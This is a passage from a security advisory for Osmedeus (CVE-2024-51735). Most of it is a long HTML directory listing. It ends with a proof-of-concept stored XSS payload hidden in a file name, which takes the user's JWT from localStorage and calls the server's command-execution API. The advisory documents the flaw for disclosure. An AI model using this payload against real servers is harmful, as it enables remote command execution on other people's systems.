href=\"test98.php\"\u003etest98.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test99.php\"\u003etest99.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test100.php\"\u003etest100.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test101.php\"\u003etest101.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test102.php\"\u003etest102.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test103.php\"\u003etest103.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test104.php\"\u003etest104.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test105.php\"\u003etest105.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test106.php\"\u003etest106.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test107.php\"\u003etest107.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test108.php\"\u003etest108.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test109.php\"\u003etest109.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test110.php\"\u003etest110.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test111.php\"\u003etest111.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test112.php\"\u003etest112.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test113.php\"\u003etest113.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test114.php\"\u003etest114.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test115.php\"\u003etest115.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test116.php\"\u003etest116.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test117.php\"\u003etest117.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test118.php\"\u003etest118.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test119.php\"\u003etest119.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test120.php\"\u003etest120.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test121.php\"\u003etest121.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test122.php\"\u003etest122.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test123.php\"\u003etest123.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test124.php\"\u003etest124.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test125.php\"\u003etest125.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test126.php\"\u003etest126.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test127.php\"\u003etest127.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test128.php\"\u003etest128.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test129.php\"\u003etest129.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test130.php\"\u003etest130.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test131.php\"\u003etest131.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test132.php\"\u003etest132.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test133.php\"\u003etest133.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test134.php\"\u003etest134.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test135.php\"\u003etest135.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test136.php\"\u003etest136.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test137.php\"\u003etest137.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test138.php\"\u003etest138.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test139.php\"\u003etest139.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test140.php\"\u003etest140.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test141.php\"\u003etest141.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test142.php\"\u003etest142.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test143.php\"\u003etest143.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test144.php\"\u003etest144.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test145.php\"\u003etest145.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test146.php\"\u003etest146.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test147.php\"\u003etest147.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test148.php\"\u003etest148.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test149.php\"\u003etest149.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test150.php\"\u003etest150.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test151.php\"\u003etest151.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test152.php\"\u003etest152.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test153.php\"\u003etest153.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test154.php\"\u003etest154.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test155.php\"\u003etest155.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test156.php\"\u003etest156.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test157.php\"\u003etest157.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test158.php\"\u003etest158.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test159.php\"\u003etest159.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test160.php\"\u003etest160.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test161.php\"\u003etest161.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test162.php\"\u003etest162.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test163.php\"\u003etest163.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test164.php\"\u003etest164.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test165.php\"\u003etest165.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test166.php\"\u003etest166.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test167.php\"\u003etest167.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test168.php\"\u003etest168.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test169.php\"\u003etest169.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test170.php\"\u003etest170.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test171.php\"\u003etest171.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test172.php\"\u003etest172.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test173.php\"\u003etest173.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test174.php\"\u003etest174.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test175.php\"\u003etest175.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test176.php\"\u003etest176.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test177.php\"\u003etest177.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test178.php\"\u003etest178.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test179.php\"\u003etest179.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test180.php\"\u003etest180.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test181.php\"\u003etest181.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test182.php\"\u003etest182.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test183.php\"\u003etest183.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test184.php\"\u003etest184.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test185.php\"\u003etest185.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test186.php\"\u003etest186.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test187.php\"\u003etest187.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test188.php\"\u003etest188.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test189.php\"\u003etest189.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test190.php\"\u003etest190.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test191.php\"\u003etest191.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test192.php\"\u003etest192.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test193.php\"\u003etest193.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test194.php\"\u003etest194.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test195.php\"\u003etest195.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test196.php\"\u003etest196.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test197.php\"\u003etest197.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test198.php\"\u003etest198.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test199.php\"\u003etest199.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test200.php\"\u003etest200.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test201.php\"\u003etest201.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test202.php\"\u003etest202.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test203.php\"\u003etest203.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test204.php\"\u003etest204.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test205.php\"\u003etest205.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test206.php\"\u003etest206.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test207.php\"\u003etest207.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test208.php\"\u003etest208.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test209.php\"\u003etest209.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test210.php\"\u003etest210.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test211.php\"\u003etest211.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test212.php\"\u003etest212.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test213.php\"\u003etest213.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test214.php\"\u003etest214.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test215.php\"\u003etest215.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test216.php\"\u003etest216.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test217.php\"\u003etest217.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test218.php\"\u003etest218.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test219.php\"\u003etest219.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test220.php\"\u003etest220.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test221.php\"\u003etest221.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test222.php\"\u003etest222.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test223.php\"\u003etest223.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test224.php\"\u003etest224.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test225.php\"\u003etest225.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test226.php\"\u003etest226.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test227.php\"\u003etest227.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test228.php\"\u003etest228.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test229.php\"\u003etest229.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test230.php\"\u003etest230.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test231.php\"\u003etest231.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test232.php\"\u003etest232.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test233.php\"\u003etest233.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test234.php\"\u003etest234.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test235.php\"\u003etest235.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test236.php\"\u003etest236.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test237.php\"\u003etest237.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test238.php\"\u003etest238.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test239.php\"\u003etest239.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test240.php\"\u003etest240.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test241.php\"\u003etest241.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test242.php\"\u003etest242.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test243.php\"\u003etest243.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test244.php\"\u003etest244.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test245.php\"\u003etest245.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test246.php\"\u003etest246.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test247.php\"\u003etest247.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test248.php\"\u003etest248.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test249.php\"\u003etest249.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test250.php\"\u003etest250.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test251.php\"\u003etest251.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test252.php\"\u003etest252.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test253.php\"\u003etest253.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test254.php\"\u003etest254.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test255.php\"\u003etest255.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test256.php\"\u003etest256.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test257.php\"\u003etest257.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test258.php\"\u003etest258.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test259.php\"\u003etest259.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test260.php\"\u003etest260.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test261.php\"\u003etest261.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test262.php\"\u003etest262.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test263.php\"\u003etest263.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test264.php\"\u003etest264.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test265.php\"\u003etest265.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test266.php\"\u003etest266.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test267.php\"\u003etest267.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test268.php\"\u003etest268.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test269.php\"\u003etest269.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test270.php\"\u003etest270.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test271.php\"\u003etest271.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test272.php\"\u003etest272.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test273.php\"\u003etest273.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test274.php\"\u003etest274.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test275.php\"\u003etest275.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test276.php\"\u003etest276.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test277.php\"\u003etest277.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test278.php\"\u003etest278.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test279.php\"\u003etest279.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test280.php\"\u003etest280.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test281.php\"\u003etest281.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test282.php\"\u003etest282.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test283.php\"\u003etest283.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test284.php\"\u003etest284.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test285.php\"\u003etest285.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test286.php\"\u003etest286.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test287.php\"\u003etest287.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test288.php\"\u003etest288.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test289.php\"\u003etest289.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test290.php\"\u003etest290.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test291.php\"\u003etest291.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test292.php\"\u003etest292.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test293.php\"\u003etest293.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test294.php\"\u003etest294.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test295.php\"\u003etest295.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test296.php\"\u003etest296.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test297.php\"\u003etest297.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test298.php\"\u003etest298.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test299.php\"\u003etest299.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test300.php\"\u003etest300.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf\"\u003eThe.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ThuHo.rar\"\u003eThuHo.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vue.js%20Master%20Class%202024%20Edition.rar\"\u003eVue.js Master Class 2024 Edition.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"VueSchool%20-%20The%20Vue.js%203%20Masterclass%20%282024-4%29.rar\"\u003eVueSchool - The Vue.js 3 Masterclass (2024-4).rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar\"\u003eVueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"win%20server%202016%281%29.ovf\"\u003ewin server 2016(1).ovf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"win%20server%202016.ovf\"\u003ewin server 2016.ovf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"?abc=\u003cscript\u003efetch(window.location.origin+\u0027/api/osmp/execute\u0027,{method:\u0027POST\u0027,body:JSON.stringify({command:\u0027echo 1 \u003e/tmp/js.txt\u0027,password:\u0027\u0027}),headers:{Authorization:\u0027Osmedeus \u0027+localStorage.jwt,\u0027Content-Type\u0027:\u0027application/json\u0027}});\u003c/script\u003e\"\u003eyxfzssjq_1721182234998.pdf\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\n```\n\n### Impact\nExecute command on server\n", "id": "GHSA-wvv7-wm5v-w2gv", "modified": "2024-11-06T19:55:13Z", "published": "2024-11-05T15:18:05Z", "references": [ { "type": "WEB", "url": "https://github.com/j3ssie/osmedeus/security/advisories/GHSA-wvv7-wm5v-w2gv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51735" }, { "type": "WEB", "url": "https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/j3ssie/osmedeus" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N", "type": "CVSS_V4" } ], "summary": "Osmedeus Web Server Vulnerable to Stored XSS, Leading to RCE" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.